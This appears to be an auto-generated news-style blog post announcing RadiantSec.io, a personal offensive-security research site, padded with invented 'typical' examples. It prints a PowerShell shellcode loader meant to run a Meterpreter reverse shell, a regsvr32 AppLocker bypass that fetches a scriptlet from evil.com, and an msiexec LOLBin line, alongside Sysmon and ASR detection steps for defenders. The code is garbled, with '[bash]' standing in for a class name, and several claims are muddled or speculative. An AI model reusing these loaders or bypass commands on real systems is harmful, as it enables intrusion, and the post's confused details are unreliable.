RadiantSecio Launched: A Deep Dive into Prathamesh P’s New Offensive Security Knowledge Hub + Video

Listen to this Post

Featured Image

Introduction:

The cybersecurity community thrives on shared knowledge, particularly the kind forged in the crucible of practical, hands-on experience. Prathamesh P., an Offensive Security Professional holding both the rigorous OSEP and CPTS certifications, has launched RadiantSec.io, a personal research site designed to demystify complex security concepts. This platform aims to bridge the gap between theoretical certification material and real-world application by offering detailed writeups on Hack The Box machines, advanced red team tooling, and corresponding blue team detection strategies.

Learning Objectives:

  • Understand how to leverage community-driven research like RadiantSec.io to supplement certification studies (OSEP/CPTS).
  • Learn practical red team techniques and the command-line tools used to execute them.
  • Identify blue team detection strategies to counter specific adversarial tactics.
  • Analyze Windows security mechanisms such as AppLocker through practical research and bypass examples.

You Should Know:

  1. From Certification to Application: OSEP and CPTS Insights
    Prathamesh’s site is positioned as a valuable resource for those pursuing advanced certifications like the Offensive Security Experienced Penetration Tester (OSEP) and the eLearnSecurity Certified Penetration Tester eXtreme (CPTS). These certifications are notorious for moving beyond basic exploit execution into the realm of advanced evasions, Active Directory attacks, and custom tooling. RadiantSec.io provides the “what happened next” that many course materials omit. For example, an OSEP module on bypassing AppLocker might teach the theory; RadiantSec.io provides a practical, step-by-step breakdown of executing that bypass in a lab environment.

  2. Red Team Techniques and Tooling: A Step-by-Step Guide to Process Injection
    A common red team technique covered in advanced certifications is process injection. Based on the context of the site, we can extrapolate a typical guide. Here is a conceptual example of how a post might demonstrate a simple yet effective injection technique using PowerShell, focusing on understanding the Windows API.

What this does: This script injects shellcode into a legitimate running process (like explorer.exe) to evade detection. It uses Windows API calls via .NET classes.
How to use it: This is for educational purposes in a controlled lab. Compile shellcode for a meterpreter reverse shell, replace the shellcode variable, and execute on a test machine.

 PowerShell Script for Remote Process Injection (Educational Purpose)
$code = '
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32")]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
'

Add the C code to the current session
Add-Type $code

Meterpreter reverse shell shellcode (x64) - Replace with your own
[Byte[]] $buf = 0xfc,0x48,0x83,...,0xd5,0x48  Truncated for brevity

Allocate memory with RWX permissions
$size = $buf.Length
[bash]$addr = [bash]::VirtualAlloc(0, $size, 0x3000, 0x40)  0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE

Copy shellcode to the allocated space
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $size)

Create a thread to execute the shellcode
$thandle = [bash]::CreateThread(0, 0, $addr, 0, 0, 0)

Wait for the thread to finish (prevents PowerShell from exiting immediately)
  1. Blue Team Detection Strategies: Hunting for Process Injection
    For every red technique, there is a blue countermeasure. A companion post on the site would detail how to detect the above activity. This moves the site beyond simple “capture the flag” solutions into defensive tradecraft.

Step 1: Monitor API Calls with Sysmon.

Configure Sysmon to log process creation (Event ID 1) and crucial API calls like `VirtualAlloc` and `CreateRemoteThread` (Event ID 8, if using a specific configuration).

Step 2: Analyse with Splunk or Elastic Stack.

Query for events where a parent process (like PowerShell) allocates memory in another process’s address space.

Step 3: Command-line Argument Analysis.

Hunt for suspicious PowerShell one-liners containing base64-encoded strings or patterns matching known injection frameworks. A simple grep-equivalent command in Linux for logs might be:

sudo grep -i "virtualalloc|createremotethread" /var/log/syslog

Step 4: Implement Windows Defender Attack Surface Reduction (ASR) Rules.
Enable rules specifically designed to block Office applications and scripting engines from making child processes or injecting code.

4. AppLocker Research: Bypass and Hardening

AppLocker is Microsoft’s application whitelisting solution and a frequent target for bypasses in OSEP. Prathamesh’s research likely covers both how attackers slip through and how defenders lock it down.
– The Attacker’s View: Using installers or trusted binaries (LOLBins) to execute arbitrary code. A classic example is using `msiexec.exe` to run a custom DLL.

msiexec /q /i "C:\path\to\malicious.msi" 

or using `regsvr32` to execute a scriptlet from a remote server.

regsvr32.exe /s /u /i:http://evil.com/file.sct scrobj.dll

– The Defender’s View: Creating proper AppLocker rules that go beyond default paths. This involves auditing current executable usage with `Get-AppLockerFileInformation` and deploying rules via Group Policy that block execution from user-writable paths (like %TEMP%, %APPDATA%).

5. HTB Machine Writeups: A Practical Methodology

Hack The Box writeups are the cornerstone of the site. A quality writeup doesn’t just provide a root flag; it documents the methodology.
– Reconnaissance: Using `nmap -sC -sV -p- ` to identify all open ports and services.
– Enumeration: Digging into web applications with `gobuster` or `ffuf` to find hidden directories. Example:

ffuf -u http://<target>/FUZZ -w /usr/share/wordlists/dirb/common.txt

– Exploitation: Analyzing a found vulnerability, such as a SQL injection, and manually crafting the payload to extract data.
– Privilege Escalation: Running automated scripts like `LinPEAS` or `WinPEAS` and then manually investigating the results to find misconfigured services or kernel exploits.

What Undercode Say:

  • Community-Driven Research is the New Textbook: RadiantSec.io exemplifies how the cybersecurity industry evolves. Official certifications provide the foundation, but community research provides the current tactics, techniques, and procedures (TTPs) that are relevant in the field today. It is an essential supplement to formal training.
  • The Red/Blue Symbiosis: The most valuable aspect of this new platform is its intent to cover both red team techniques and blue team detection. This holistic approach is critical. Understanding how an attack works from the offensive side allows a defender to build far more effective and resilient detections than simply chasing Indicators of Compromise (IOCs).
  • Depth Over Breadth: Focusing on AppLocker research, specific certifications, and detailed writeups suggests a commitment to depth. This is more valuable than a surface-level blog covering dozens of topics. For professionals, deep dives into specific security controls like AppLocker are invaluable for understanding the nuances of both breaking and fixing them.

Prediction:

Resources like RadiantSec.io will increasingly become the primary source of truth for working professionals. As certification materials lag behind the rapidly shifting threat landscape (especially with the rise of AI-generated malware and advanced social engineering), personal research sites and communities will become the de facto standard for staying current. We will likely see a “democratization” of advanced offensive tradecraft, forcing defensive tooling to become more adaptive and behavior-based rather than relying on static signatures. This will accelerate the arms race, requiring continuous learning and a more profound understanding of core system internals from all security practitioners.

▶️ Related Video (82% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Prathamesh Praghanmol – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky